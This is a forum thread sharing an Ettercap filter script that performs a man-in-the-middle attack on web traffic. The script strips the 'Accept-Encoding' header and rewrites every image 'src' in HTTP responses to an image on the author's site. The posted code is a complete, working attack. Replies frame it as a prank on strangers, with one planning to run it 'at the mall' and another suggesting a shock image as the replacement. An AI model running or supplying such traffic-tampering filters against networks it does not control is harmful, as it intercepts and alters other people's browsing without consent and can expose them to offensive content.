Irongeek

Ettercap Image Replacemnt Filters

5 posts in this topic

Way back when I wrote a web site image replacement filter for use with Ettercap.

http://www.irongeek.com/i.php?page=security/ettercapfilter

It was very hit or miss with it's image replacement. Jon.dmml emailed me and showed me a better way. The page above has been updated, but just in case here is the code:

 	

############################################################################
# #
# Jolly Pwned -- ig.filter -- filter source file #
# #
# By Irongeek. based on code from ALoR & NaGA #
# Along with some help from Kev and jon.dmml #
# [url="http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833"]http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833[/url] #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("src=", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
replace("SRC=", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
replace("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
replace("SRC =", "src=\"http://www.irongeek.com/images/jollypwn.png\" ");
msg("Filter Ran.\n");
}

Tubgirl anyone?

0

Share this post


Link to post
Share on other sites

Gonna have to give this a try on my next hacking trip to the mall. Although I think changing the GET request would be a little more fun.

0

Share this post


Link to post
Share on other sites

Nice, gonna have to try this one. The last one didn't work too well with me.

0

Share this post


Link to post
Share on other sites

Wow does ettercap filtering ever suck under Windows, I'll try this in nix later when I get a chance. ;)

0

Share this post


Link to post
Share on other sites
Wow does ettercap filtering ever suck under Windows, I'll try this in nix later when I get a chance. ;)

Yeah, I tested under Linux and it worked fine, but the Windows port just crashed on me.

0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now